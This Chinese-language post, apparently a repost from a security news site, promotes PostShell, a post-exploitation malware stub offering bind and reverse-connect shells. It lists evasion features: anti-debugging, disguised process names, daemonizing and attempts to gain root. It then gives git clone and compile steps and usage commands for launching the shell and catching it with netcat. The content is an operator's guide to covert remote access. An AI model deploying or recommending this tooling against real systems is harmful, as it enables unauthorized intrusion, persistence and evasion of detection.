PostShell是一个利用后的shell,包括绑定外壳和反向连接shell。它创建了一个完全交互式的TTY,可以进行作业控制。stub的大小约为14kb,可以在任何类似Unix的系统上进行编译。
为什么不使用传统的Backconnect / Bind Shell?
PostShell通过使攻击者对Python和Perl等依赖项的依赖性降低,从而使后开发变得更容易。它还包含反向连接和绑定shell,这意味着如果目标不允许传出连接,则操作员可以简单地启动绑定外壳并远程连接到计算机。由于进程名称和参数都被掩盖了,因此PostShell的可疑性也大大低于传统的Shell。特征
反调试,如果检测到ptrace已附加到shell程序,它将退出。
进程名称/线程名称是伪装的,假名称将覆盖所有系统参数和文件名,以使其看起来像合法程序。
TTY,将创建一个TTY,该TTY本质上允许机器的使用与通过SSH连接时的使用相同。
绑定/反向连接shell,可以创建绑定shell和反向连接。
生成一个非常小的stub(<14kb)。
自动守护进程
尝试将GUID / UID设置为0
安装
git clone https://github.com/rek7/postshell
cd postshell && sh compile.sh 这应该创建一个名为“ stub”的二进制文件,这是恶意软件。命令
$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
反向连接:
$ ./stub 127.0.0.1 13377
绑定外壳:
$ ./stub 13377
接收与Netcat的连接
接收反向连接:
$ nc -vlp 端口
连接到绑定外壳程序:
$ nc 主机 端口文章来源及下载:
https://github.com/rek7/postshell
如有侵权请联系:admin#unsafe.sh